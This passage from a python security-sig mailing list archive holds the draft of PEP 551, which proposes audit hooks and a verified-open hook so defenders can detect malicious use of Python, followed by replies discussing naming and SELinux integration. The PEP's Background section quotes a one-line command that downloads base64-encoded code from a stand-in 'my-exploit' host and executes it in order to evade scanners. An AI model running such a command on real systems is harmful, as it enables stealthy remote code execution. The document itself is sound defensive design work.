ignores bytecode completely.

On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:

> Hi security-sig,
>
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
>
> This comes out of work we've been doing at Microsoft to balance the
> flexibility of scripting languages with their usefulness to malicious
> users. PowerShell in particular has had a lot of work done, and we've
> been doing the same internally for Python. Things like transcripting
> (log every piece of code when it is compiled) and signature validation
> (prevent loading unsigned code).
>
> This PEP is about upstreaming enough functionality to make it easier to
> maintain these features - it is *not* intended to add specific security
> features to the core release. The aim is to be able to use a standard
> libpython3.7/python37.dll with a custom python3.7/python.exe that adds
> those features (listed in the PEP).
>
> Right now parts of the PEP is incomplete. In particular, the
> Recommendations section is much shorter than I intend, the list of log
> hook locations is also too short, and I have only done a preliminary
> performance analysis. But it's time to get reviews of the overall
> concept. I'd also like to take suggestions for more hook locations and
> relevant recommendations, so feel free to throw them out there. In
> particular, I'm not as up to date on best practices for non-Windows
> platforms as the rest of the list, so feel free to correct or improve
> those parts.
>
> Because ReST+max 80 character width makes tables completely unreadable
> in source, I suggest reading it at
> https://github.com/python/peps/blob/master/pep-0551.rst but I've
> included the full text below for quoting purposes.
>
> My current implementation is available at
> https://github.com/zooba/cpython/tree/sectrans and should work on both
> Windows and Linux. I hope to take this to python-dev by next week and
> spend the dev sprints getting the PEP to the point where it can be
> accepted.
>
> ==========================================================
>
> PEP: 551
> Title: Security transparency in the Python runtime
> Version: $Revision$
> Last-Modified: $Date$
> Author: Steve Dower <steve.dower at python.org>
> Status: Draft
> Type: Standards Track
> Content-Type: text/x-rst
> Created: 23-Aug-2017
> Python-Version: 3.7
> Post-History:
>
> Abstract
> ========
>
> This PEP describes additions to the Python API and specific behaviors
> for the
> CPython implementation that make actions taken by the Python runtime
> visible to
> security and auditing tools. The goals in order of increasing importance
> are to
> prevent malicious use of Python, to detect and report on malicious use,
> and most
> importantly to detect attempts to bypass detection. Most of the
> responsibility
> for implementation is required from users, who must customize and build
> Python
> for their own environment.
>
> We propose two small sets of public APIs to enable users to reliably
> build their
> copy of Python without having to modify the core runtime, protecting future
> maintainability. We also discuss recommendations for users to help them
> develop
> and configure their copy of Python.
>
> Background
> ==========
>
> Software vulnerabilities are generally seen as bugs that enable remote or
> elevated code execution. However, in our modern connected world, the more
> dangerous vulnerabilities are those that enable advanced persistent threats
> (APTs). APTs are achieved when an attacker is able to penetrate a network,
> establish their software on one or more machines, and over time extract
> data or
> intelligence. Some APTs may make themselves known by maliciously
> damaging data
> (e.g., `WannaCrypt
> <
> https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt
> >`_)
> or hardware (e.g., `Stuxnet
> <
> https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet
> >`_).
> Most attempt to hide their existence and avoid detection. APTs often use a
> combination of traditional vulnerabilities, social engineering, phishing
> (or
> spear-phishing), thorough network analysis, and an understanding of
> misconfigured environments to establish themselves and do their work.
>
> The first infected machines may not be the final target and may not require
> special privileges. For example, an APT that is established as a
> non-administrative user on a developer?s machine may have the ability to
> spread
> to production machines through normal deployment channels. It is common
> for APTs
> to persist on as many machines as possible, with sheer weight of
> presence making
> them difficult to remove completely.
>
> Whether an attacker is seeking to cause direct harm or hide their
> tracks, the
> biggest barrier to detection is a lack of insight. System administrators
> with
> large networks rely on distributed logs to understand what their
> machines are
> doing, but logs are often filtered to show only error conditions. APTs
> that are
> attempting to avoid detection will rarely generate errors or abnormal
> events.
> Reviewing normal operation logs involves a significant amount of effort,
> though
> work is underway by a number of companies to enable automatic anomaly
> detection
> within operational logs. The tools preferred by attackers are ones that are
> already installed on the target machines, since log messages from these
> tools
> are often expected and ignored in normal use.
>
> At this point, we are not going to spend further time discussing the
> existence
> of APTs or methods and mitigations that do not apply to this PEP. For
> further
> information about the field, we recommend reading or watching the resources
> listed under `Further Reading`_.
>
> Python is a particularly interesting tool for attackers due to its
> prevalence on
> server and developer machines, its ability to execute arbitrary code
> provided as
> data (as opposed to native binaries), and its complete lack of internal
> logging.
> This allows attackers to download, decrypt, and execute malicious code
> with a
> single command::
>
>      python -c "import urllib.request, base64;
> exec(base64.b64decode(urllib.request.urlopen('
> http://my-exploit/py.b64')).decode())"
>
> This command currently bypasses most anti-malware scanners that rely on
> recognizable code being read through a network connection or being
> written to
> disk (base64 is often sufficient to bypass these checks). It also bypasses
> protections such as file access control lists or permissions (no file
> access
> occurs), approved application lists (assuming Python has been approved
> for other
> uses), and automated auditing or logging (assuming Python is allowed to
> access
> the internet or access another machine on the local network from which
> to obtain
> its payload).
>
> General consensus among the security community is that totally preventing
> attacks is infeasible and defenders should assume that they will often
> detect
> attacks only after they have succeeded. This is known as the "assume
> breach"
> mindset. [1]_ In this scenario, protections such as sandboxing and input
> validation have already failed, and the important task is detection,
> tracking,
> and eventual removal of the malicious code. To this end, the primary
> feature
> required from Python is security transparency: the ability to see what
> operations the Python runtime is performing that may indicate anomalous or
> malicious use. Preventing such use is valuable, but secondary to the need
> to
> know that it is occurring.
>
> To summarise the goals in order of increasing importance:
>
> * preventing malicious use is valuable
> * detecting malicious use is important
> * detecting attempts to bypass detection is critical
>
> One example of a scripting engine that has addressed these challenges is
> PowerShell, which has recently been enhanced towards similar goals of
> transparency and prevention. [2]_
>
> Generally, application and system configuration will determine which events
> within a scripting engine are worth logging. However, given the value of
> many
> logs events are not recognized until after an attack is detected, it is
> important to capture as much as possible and filter views rather than
> filtering
> at the source (see the No Easy Breach video from above). Events that are
> always
> of interest include attempts to bypass event logging, attempts to load and
> execute code that is not correctly signed or access-controlled, use of
> uncommon
> operating system functionality such as debugging or inter-process
> inspection
> tools, most network access and DNS resolution, and attempts to create
> and hide
> files or configuration settings on the local machine.
>
> To summarize, defenders have a need to audit specific uses of Python in
> order to
> detect abnormal or malicious usage. Currently, the Python runtime does not
> provide any ability to do this, which (anecdotally) has led to
> organizations
> switching to other languages. The aim of this PEP is to enable system
> administrators to deploy a security transparent copy of Python that can
> integrate with their existing auditing and protection systems.
>
> On Windows, some specific features that may be enabled by this include:
>
> * Script Block Logging [3]_
> * DeviceGuard [4]_
> * AMSI [5]_
> * Persistent Zone Identifiers [6]_
> * Event tracing (which includes event forwarding) [7]_
>
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules
>
>
> On macOS, some features that may be used with the expanded APIs are:
>
> * OpenBSM [10]_
> * syslog [11]_
>
> Overall, the ability to enable these platform-specific features on
> production
> machines is highly appealing to system administrators and will make Python
> a
> more trustworthy dependency for application developers.
>
>
> Overview of Changes
> ===================
>
> True security transparency is not fully achievable by Python in
> isolation. The
> runtime can log as many events as it likes, but unless the logs are
> reviewed and
> analyzed there is no value. Python may impose restrictions in the name of
> security, but usability may suffer. Different platforms and environments
> will
> require different implementations of certain security features, and
> organizations with the resources to fully customize their runtime should be
> encouraged to do so.
>
> The aim of these changes is to enable system administrators to integrate
> Python
> into their existing security systems, without dictating what those
> systems look
> like or how they should behave. We propose two API changes to enable
> this: an
> Event Log Hook and Verified Open Hook. Both are not set by default, and
> both
> require modifying the appropriate entry point to enable any
> functionality. For
> the purposes of validation and example, we propose a new
> spython/spython.exe
> entry point program that enables some basic functionality using these
> hooks.
> However, the expectation is that security-conscious organizations will
> create
> their own entry points to meet their needs.
>
> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages
> from within certain operations. These operations are typically deep
> within the
> Python runtime or standard library, such as dynamic code compilation,
> module
> imports, DNS resolution, or use of certain modules such as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>     # Add a logging hook
>     sys.addloghook(hook: Callable[str, tuple]) -> None
>     int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>     # Raise an event with all logging hooks
>     sys.loghook(str, *args) -> None
>     int PySys_LogHook(const char *event, PyObject *args);
>
>     # Internal API used during Py_Finalize() - not publicly accessible
>     void _Py_ClearLogHooks(void);
>
> Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
> including
> before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
> Python code.
> Hooks are never removed or replaced, and existing hooks have an
> opportunity to
> refuse to allow new hooks to be added (adding a logging hook is logged,
> and so
> preexisting hooks can raise an exception to block the new addition).
>
> When events of interest are occurring, code can either call
> ``PySys_LogHook()``
> from C (while the GIL is held) or ``sys.loghook()``. The string argument
> is the
> name of the event, and the tuple contains arguments. A given event name
> should
> have a fixed schema for arguments, and both arguments are considered a
> public
> API (for a given x.y version of Python), and thus should only change
> between
> feature releases with updated documentation.
>
> When an event is logged, each hook is called in the order it was added
> with the
> event name and tuple. If any hook returns with an exception set, later
> hooks are
> ignored and *in general* the Python runtime should terminate. This is
> intentional to allow hook implementations to decide how to respond to any
> particular event. The typical responses will be to log the event, abort the
> operation with an exception, or to immediately terminate the process with
> an
> operating system exit call.
>
> When an event is logged but no hooks have been set, the ``loghook()``
> function
> should include minimal overhead. Ideally, each argument is a reference to
> existing data rather than a value calculated just for the logging call.
>
> As hooks may be Python objects, they need to be freed during
> ``Py_Finalize()``.
> To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases
> any
> ``PyObject*`` hooks that are held, as well as any heap memory used. This
> is an
> internal function with no public export, but it passes an event to all
> existing
> hooks to ensure that unexpected calls are logged.
>
> See `Log Hook Locations`_ for proposed log hook points and schemas, and the
> `Recommendations`_ section for discussion on appropriate responses.
>
> Verified Open Hook
> ------------------
>
> Most operating systems have a mechanism to distinguish between files
> that can be
> executed and those that can not. For example, this may be an execute bit
> in the
> permissions field, or a verified hash of the file contents to detect
> potential
> code tampering. These are an important security mechanism for preventing
> execution of data or code that is not approved for a given environment.
> Currently, Python has no way to integrate with these when launching
> scripts or
> importing modules.
>
> The new public API for the verified open hook is::
>
>     # Set the handler
>     int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char
> *narrow, const wchar_t *wide))
>
>     # Open a file using the handler
>     os.open_for_exec(pathlike)
>
> The ``os.open_for_exec()`` function is a drop-in replacement for
> ``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
> binary access - any more restrictive behaviour requires the use of a custom
> handler. (Aside: since ``importlib`` requires access to this function
> before the
> ``os`` module has been imported, it will be available on the
> ``nt``/``posix``
> modules, but the intent is that other users will access it through the
> ``os``
> module.)
>
> A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
> from C
> at any time, including before ``Py_Initialize()``. When
> ``open_for_exec()`` is
> called with a handler set, the handler will be passed the processed
> narrow or
> wide path, depending on platform, and its return value will be returned
> directly. The returned object should be an open file-like object that
> supports
> reading raw bytes. This is explicitly intended to allow a ``BytesIO``
> instance
> if the open handler has already had to read the file into memory in order
> to
> perform whatever verification is necessary to determine whether the
> content is
> permitted to be executed.
>
> Note that these handlers can import and call the ``_io.open()`` function on
> CPython without triggering themselves.
>
> If the handler determines that the file is not suitable for execution,
> it should
> raise an exception of its choice, as well as performing any other logging
> or
> notifications.
>
> All import and execution functionality involving code from a file will be
> changed to use ``open_for_exec()`` unconditionally. It is important to
> note that
> calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
> function - a log hook that includes the code from these calls will be
> added and
> is the best opportunity to validate code that is read from the file.
> Given the
> current decoupling between import and execution in Python, most imported
> code
> will go through both ``open_for_exec()`` and the log hook for
> ``compile``, and
> so care should be taken to avoid repeating verification steps.
>
> API Availability
> ----------------
>
> While all the functions added here are considered public and stable API,
> the
> behavior of the functions is implementation specific. The descriptions here
> refer to the CPython implementation, and while other implementations should
> provide the functions, there is no requirement that they behave the same.
>
> For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
> may do
> nothing. This allows code to make calls to ``sys.loghook()`` without
> having to
> test for existence, but it should not assume that its call will have any
> effect.
> (Including existence tests in security-critical code allows another
> vector to
> bypass logging, so it is preferable that the function always exist.)
>
> ``os.open_for_exec()`` should at a minimum always return
> ``_io.open(pathlike,
> 'rb')``. Code using the function should make no further assumptions
> about what
> may occur, and implementations other than CPython are not required to let
> developers override the behavior of this function with a hook.
>
>
> Log Hook Locations
> ==================
>
> Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
> following
> operations with the schema in Table 1. Unless otherwise specified, the
> ability
> for log hooks to abort any listed operation should be considered part of
> the
> rationale for including the hook.
>
> .. csv-table:: Table 1: Log Hooks
>     :header: "API Function", "Event Name", "Arguments", "Rationale"
>     :widths: 2, 2, 3, 6
>
>     ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
> hooks are
>     being added."
>     ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
> hooks they
>     are being cleaned up, mainly in case the event is triggered
> unexpectedly.
>     This event cannot be aborted."
>     ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
> "Detects
>     any attempt to set the ``open_for_execute`` handler."
>     "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
> ``compile``, "
>     ``(code, filename_or_none)``", "Detect dynamic code compilation.
> Note that
>     this will also be called for regular imports of source code,
> including those
>     that used ``open_for_exec``."
>     ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
>     sys.path_hooks)``", "Detect when modules are imported. This is
> raised before
>     the module name is resolved to a file. All arguments other than the
> module
>     name may be ``None`` if they are not used or available."
>     "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
>     ``(module_or_path,)``", "Detect when native modules are used."
>     ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
> "Collect
>     information about specific symbols retrieved from native modules."
>     ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
> when code
>     is accessing arbitrary memory using ``ctypes``"
>     ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
> the id of
>     objects, which in CPython reveals information about memory layout."
>     ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
> when
>     code is accessing frames directly"
>     ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
> code is
>     accessing frames directly"
>     ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
> injecting
>     trace functions. Because of the implementation, exceptions raised
> from the
>     hook will abort the operation, but will not be raised in Python
> code. Note
>     that ``threading.setprofile`` eventually calls this function, so the
> event
>     will be logged for each thread."
>     ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
> injecting
>     trace functions. Because of the implementation, exceptions raised
> from the
>     hook will abort the operation, but will not be raised in Python
> code. Note
>     that ``threading.settrace`` eventually calls this function, so the
> event
>     will be logged for each thread."
>     ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "",
> "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "",
> "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
> "Detect
>     changes to the coroutine wrapper."
>     ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``,
> "``(new_limit,)``", "
>     Detect changes to the recursion limit."
>     ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``,
> "``(interval_us,)``
>     ", "Detect changes to the switching interval."
>     "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
>     ``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
> "``(address,)``
>     ", "Detect access to network resources. The address is unmodified
> from the
>     original call."
>     ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
>     creation of sockets. The arguments will be int values."
>     ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
>     retrieve the current host name."
>     ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
>     attempts to change the current host name. The name argument is
> passed as a
>     bytes object."
>     "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
>     ``socket.gethostbyname``", "``(name,)``", "Detect host name
> resolution. The
>     name argument is a str or bytes object."
>     ``socket.gethostbyaddr``, ``socket.gethostbyaddr``,
> "``(address,)``", "Detect
>     host resolution. The address argument is a str or bytes object."
>     ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
> protocol)``", "
>     Detect service resolution. The arguments are str objects."
>     ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
> protocol)``", "
>     Detect service resolution. The port argument is an int and protocol is
> a
>     str."
>
> TODO - more hooks in ``_socket``, ``_ssl``, others?
>
>
> SPython Entry Point
> ===================
>
> A new entry point binary will be added, called ``spython.exe`` on
> Windows and
> ``spythonX.Y`` on other platforms. This entry point is intended
> primarily as an
> example, as we expect most users of this functionality to implement
> their own
> entry point and hooks (see `Recommendations`_). It will also be used for
> tests.
>
> Source builds will create ``spython`` by default, but distributors may
> choose
> whether to include ``spython`` in their pre-built packages. The python.org
> managed binary distributions will not include ``spython``.
>
> **Do not accept most command-line arguments**
>
> The ``spython`` entry point requires a script file be passed as the first
> argument, and does not allow any options. This prevents arbitrary code
> execution
> from in-memory data or non-script files (such as pickles, which can be
> executed
> using ``-m pickle <path>``.
>
> Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
> variables)
> and ``-s`` (no user site) are assumed.
>
> If a file with the same full path as the process with a ``._pth`` suffix
> (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
> will be
> used to initialize ``sys.path`` following the rules currently described
> `for
> Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
>
> **Log security events to a file**
>
> Before initialization, ``spython`` will set a log hook that writes
> events to a
> local file. By default, this file is the full path of the process with a
> ``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
> variable (despite such overrides being explicitly discouraged in
> `Recommendations`_).
>
> The log hook will also abort all ``addloghook`` events, preventing any
> other
> hooks from being added.
>
> On Windows, code from ``compile`` events will submitted to AMSI [5]_ and
> if it
> fails to validate, the compile event will be aborted. This can be tested by
> calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
> <http://www.eicar.org/86-0-Intended-use.html>`_.
>
> **Restrict importable modules**
>
> Also before initialization, ``spython`` will set an open-for-execute
> hook that
> validates all files opened with ``os.open_for_exec``. This
> implementation will
> require all files to have a ``.py`` suffix (thereby blocking the use of
> cached
> bytecode), and will raise a custom log message ``spython.open_for_exec``
> containing ``(filename, True_if_allowed)``.
>
> On Windows, the hook will also open the file with flags that prevent any
> other
> process from opening it with write access, which allows the hook to perform
> additional validation on the contents with confidence that it will not be
> modified between the check and use. Compilation will later trigger a
> ``compile``
> event, so there is no need to read the contents now for AMSI, but other
> validation mechanisms such as DeviceGuard [4]_ should be performed here.
>
>
> Performance Impact
> ==================
>
> **TODO**
>
> Full impact analysis still requires investigation. Preliminary testing
> shows
> that calling ``sys.loghook`` with no hooks added does not significantly
> affect
> any existing benchmarks, though targeted microbenchmarks can observe an
> impact.
>
> Performance impact using ``spython`` or with hooks added are not of
> interest
> here, since this is considered opt-in functionality.
>
>
> Recommendations
> ===============
>
> Specific recommendations are difficult to make, as the ideal
> configuration for any environment will depend on the user's ability to
> manage, monitor, and respond to activity on their own network. However,
> many of the proposals here do not appear to be of value without deeper
> illustration. This section provides recommendations using the terms
> **should** (or **should not**), indicating that we consider it dangerous
> to ignore the advice, and **may**, indicating that for the advice ought
> to be considered for high value systems. The term **sysadmins** refers
> to whoever is responsible for deploying Python throughout your network,
> though different organizations may have different titles for the
> relevant person.
>
> Sysadmins **should** build their own entry point, likely starting from
> ``spython``, and directly interface with the security systems available
> in their environment. The more tightly integrated, the less likely a
> vulnerability will be found allowing an attacker to bypass those
> systems. In particular, the entry point **should not** obtain any
> settings from the current environment, such as environment variables,
> unless those settings are otherwise protected from modification.
>
> The default ``python`` entry point **should not** be deployed to
> production machines, but could be given to developers to use and test
> Python on non-production machines. Sysadmins **may** consider deploying
> a less restrictive version of their entry point to developer machines,
> since any system connected to your network is a potential target.
>
> Python deployments **should** be made read-only using any available
> platform functionality after deployment and during use.
>
> On platforms that support it, sysadmins **should** include signatures
> for every file in a Python deployment, ideally verified using a private
> certificate. For example, Windows supports embedding signatures in
> executable files and using catalogs for others, and can use DeviceGuard
> [4]_ to validate signatures either automatically or using an
> ``open_for_exec`` hook.
>
> Sysadmins **should** collect as many logged events as possible, and
> **should** copy them off of local machines frequently. Even if logs are
> not being constantly monitored for suspicious activity, once an attack
> is detected it is too late to enable logging. Log hooks **should not**
> attempt to preemptively filter events, as even benign events are useful
> when analyzing the progress of an attack. (Watch the "No Easy Breach"
> video under `Further Reading`_ for a deeper look at this side of things.)
>
> Log hooks **should** write events to logs before attempting to abort. As
> discussed earlier, it is more important to record malicious actions than
> to prevent them. Very few actions should be aborted, as most will occur
> during normal use. Sysadmins **may** audit their Python code and abort
> operations that are known to never be used deliberately.
>
> On production machines, the first log hook **should** be set in C code
> before ``Py_Initialize`` is called, and that hook **should**
> unconditionally abort the ``sys.addloghook`` event. The Python interface
> is mainly useful for testing.
>
> On production machines, a non-validating ``open_for_exec`` hook **may**
> be set in C code before ``Py_Initialize`` is called. This prevents later
> code from overriding the hook, however, logging the
> ``setopenforexecutehandler`` event is useful since no code should ever
> need to call it. Using at least the sample ``open_for_exec`` hook
> implementation from ``spython`` is recommended.
>
> [TODO: more good advice; less bad advice]
>
> Further Reading
> ===============
>
>
> **Redefining Malware: When Old Terms Pose New Threats**
>      By Aviv Raff for SecurityWeek, 29th January 2014
>
>      This article, and those linked by it, are high-level summaries of
> the rise of
>      APTs and the differences from "traditional" malware.
>
>
> `<
> http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats
> >`_
>
> **Anatomy of a Cyber Attack**
>      By FireEye, accessed 23rd August 2017
>
>      A summary of the techniques used by APTs, and links to a number of
> relevant
>      whitepapers.
>
>
> `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html
> >`_
>
> **Automated Traffic Log Analysis: A Must Have for Advanced Threat
> Protection**
>      By Aviv Raff for SecurityWeek, 8th May 2014
>
>      High-level summary of the value of detailed logging and automatic
> analysis.
>
>
> `<
> http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection
> >`_
>
> **No Easy Breach: Challenges and Lessons Learned from an Epic
> Investigation**
>      Video presented by Matt Dunwoody and Nick Carr for Mandiant at
> SchmooCon 2016
>
>      Detailed walkthrough of the processes and tools used in detecting
> and removing
>      an APT.
>
>      `<https://archive.org/details/No_Easy_Breach>`_
>
> **Disrupting Nation State Hackers**
>      Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
>
>      Good security practices, capabilities and recommendations from the
> chief of
>      NSA's Tailored Access Operation.
>
>      `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
>
> References
> ==========
>
> .. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
>
> .. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
>     Protection Advances in Windows 10,
> `<
> https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
> >`_
>
> .. [3]
> `<
> https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
> >`_
>
> .. [4] `<https://aka.ms/deviceguard>`_
>
> .. [5] AMSI,
> `<
> https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx
> >`_
>
> .. [6] Persistent Zone Identifiers,
> `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
>
> .. [7] Event tracing,
> `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
>
> .. [8] `<https://www.gnupg.org/>`_
>
> .. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
>
> .. [10] `<http://www.trustedbsd.org/openbsm.html>`_
>
> .. [11] `<https://linux.die.net/man/3/syslog>`_
>
> Acknowledgments
> ===============
>
> Thanks to all the people from Microsoft involved in helping make the Python
> runtime safer for production use, and especially to James Powell for
> doing much
> of the initial research, analysis and implementation, Lee Holmes for
> invaluable
> insights into the info-sec field and PowerShell's responses, and Brett
> Cannon
> for the grounding discussions.
>
> Copyright
> =========
>
> Copyright (c) 2017 by Microsoft Corporation. This material may be
> distributed
> only subject to the terms and conditions set forth in the Open Publication
> License, v1.0 or later (the latest version is presently available at
> http://www.opencontent.org/openpub/).
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170825/4042a8bd/attachment-0001.html>

From ncoghlan at gmail.com  Fri Aug 25 02:17:34 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Fri, 25 Aug 2017 16:17:34 +1000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>

Migrating my comments from Twitter :)

I really like this PEP as a way of enabling runtime hardening of
platform-integrated Python builds, without tightly coupling upstream
development to the evolution of the related platform security APIs, so
a big +1 from me for the general idea.

On 25 August 2017 at 03:13, Steve Dower <steve.dower at python.org> wrote:
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules

A couple more references/integration ideas:

* emitting Linux audit log events
(https://github.com/linux-audit/audit-documentation/wiki/SPEC-Writing-Good-Events)
* restricting imports and code execution to files with appropriate
SELinux labels (e.g. defining a "py_exec_t" type and checking that in
open_for_exec)

We wouldn't be able to do this kind of thing to /usr/bin/python3
without breaking the world, but there's more scope for making changes
to private installations like Fedora's /usr/libexec/platform-python
(see https://fedoraproject.org/wiki/Changes/Platform_Python_Stack -
we're not going to migrate everything to use that, but we *do* want to
get to the point where that's the only Python available in a minimal
Fedora install, which means migrating at least dnf/yum and the
associated plugins).

> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages
> from within certain operations. These operations are typically deep within
> the
> Python runtime or standard library, such as dynamic code compilation, module
> imports, DNS resolution, or use of certain modules such as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>    # Add a logging hook
>    sys.addloghook(hook: Callable[str, tuple]) -> None
>    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>    # Raise an event with all logging hooks
>    sys.loghook(str, *args) -> None
>    int PySys_LogHook(const char *event, PyObject *args);
>
>    # Internal API used during Py_Finalize() - not publicly accessible
>    void _Py_ClearLogHooks(void);

Bikeshed: to more clearly distinguish this proposal from regular
logging module events, I'd suggest calling these audit hooks rather
than log hooks. I also think this could be a separate module at the
Python level (e.g. "runtimeaudit"), and a separate prefix at the C API
level (e.g. "PyAudit_*") rather than needing to be directly in the sys
namespace.

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From steve.dower at python.org  Fri Aug 25 13:22:41 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 10:22:41 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
Message-ID: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>

On 24Aug2017 2317, Nick Coghlan wrote:
> Migrating my comments from Twitter :)
> 
> I really like this PEP as a way of enabling runtime hardening of
> platform-integrated Python builds, without tightly coupling upstream
> development to the evolution of the related platform security APIs, so
> a big +1 from me for the general idea.

Thanks!

> On 25 August 2017 at 03:13, Steve Dower <steve.dower at python.org> wrote:
>> On Linux, some specific features that may be integrated are:
>>
>> * gnupg [8]_
>> * sd_journal [9]_
>> * OpenBSM [10]_
>> * syslog [11]_
>> * check execute bit on imported modules
> 
> A couple more references/integration ideas:
> 
> * emitting Linux audit log events
> (https://github.com/linux-audit/audit-documentation/wiki/SPEC-Writing-Good-Events)
> * restricting imports and code execution to files with appropriate
> SELinux labels (e.g. defining a "py_exec_t" type and checking that in
> open_for_exec)

Nice. I looked into SELinux and didn't find any docs about how to add 
labels. I'd really like to include links that help people actually 
implement this stuff - any tips?

> We wouldn't be able to do this kind of thing to /usr/bin/python3
> without breaking the world, but there's more scope for making changes
> to private installations like Fedora's /usr/libexec/platform-python
> (see https://fedoraproject.org/wiki/Changes/Platform_Python_Stack -
> we're not going to migrate everything to use that, but we *do* want to
> get to the point where that's the only Python available in a minimal
> Fedora install, which means migrating at least dnf/yum and the
> associated plugins).

Yep, that's the use case, though auditing /usr/bin/python3 shouldn't 
inherently break anything. Actually aborting operations or restricting 
imports in any way only makes sense in a fully (or mostly) controlled 
environment.

> Bikeshed: to more clearly distinguish this proposal from regular
> logging module events, I'd suggest calling these audit hooks rather
> than log hooks. I also think this could be a separate module at the
> Python level (e.g. "runtimeaudit"), and a separate prefix at the C API
> level (e.g. "PyAudit_*") rather than needing to be directly in the sys
> namespace.

+1 on "audit hooks" - I'll change to that when I do my next pass. But -1 
on having the separate module and -0 on "PyAudit_*" (as a result of it 
not being in its own module).

It's important to minimise the surface area of these features, and 
having the ability to disable auditing by shadowing/replacing a module 
is a little scary. At least when you replace sys you've got to do a bit 
of work to keep it a secret. (This is also the reasoning for using 
static variables internally rather than interpreter state - it's much 
harder to infer the address of a static C variable with pure Python code 
than a field in a struct.)

